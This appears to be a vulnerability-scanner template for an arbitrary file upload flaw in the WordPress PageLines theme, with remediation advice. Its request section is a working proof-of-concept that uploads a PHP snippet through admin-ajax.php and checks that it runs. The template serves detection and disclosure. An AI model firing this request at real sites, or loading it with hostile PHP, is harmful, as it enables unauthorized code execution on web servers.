id: Wordpress-Pagelines_Plugins-ArbitraryFileUpload
info:
  name: WordPress Pagelines Arbitrary File Upload
  author:
  - l0ne1y
  description: |-
    WordPress Theme Pagelines Arbitrary File Upload Vulnerability
    WordPress is a blogging platform developed by the WordPress Foundation using the PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. PageLines theme is a multi-purpose website theme plug-in used in it.

    The WordPress PageLines backend does not verify file extensions, allowing attackers to upload arbitrary files.
  reference:
  - http://www.freebuf.com/vuls/57594.html
  severity: critical
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://www.pagelines.com/

    Temporary fix:
    File upload:
    1. The server side directly sets the file upload directory to non-executable.
    2. File type check: It is recommended to use the whitelist method (more reliable than the blacklist), combined with MIME Type, suffix check and other methods (the file type is restricted by the whitelist). In addition, you can use the compression function or resize function to process images, which will destroy the HTML code they contain while processing the image.
    3. Use random numbers to rewrite file names and file paths so that users cannot easily access their uploaded files.
    4. Set the domain name of the file server separately.
    5. Verify the file content and use regular rules to match malicious code (filter various bypass methods of malicious code, such as upper and lower case, BASE64 encoding) to limit uploading.
    6. Fix possible parsing vulnerabilities in the server.
    7. Strictly restrict the upload of files that can modify the server configuration, such as: .htaccess.
    8. Hide the upload file path.
    9. Upgrade Web Server.
    10. Fix the Web upload code in a timely manner.
    11. There cannot be any local files containing vulnerabilities.
    12. Pay attention to 0x00 truncation attack (update PHP to the latest version).
requests:
- matchers:
  - type: dsl
    dsl:
    - 'contains(body,"c4ca4238a0b923820dcc509a6f75849b") && status_code==200 '
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-admin/admin-ajax.php?action=test&page=pagelines'
  method: POST
  body: |-
    ------WebKitFormBoundary1Ja5UxAmMrAAwPGM Content-Disposition: form-data; name="settings_upload"
    settings ------WebKitFormBoundary1Ja5UxAmMrAAwPGM Content-Disposition: form-data; name="file"; filename="Settingssettings.txt" Content-Type: text/plain
    <?php echo md5(1); die(); ?> ------WebKitFormBoundary1Ja5UxAmMrAAwPGM Content-Disposition: form-data; name="submit"
    Submit ------WebKitFormBoundary1Ja5UxAmMrAAwPGM--
  headers:
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1Ja5UxAmMrAAwPGM
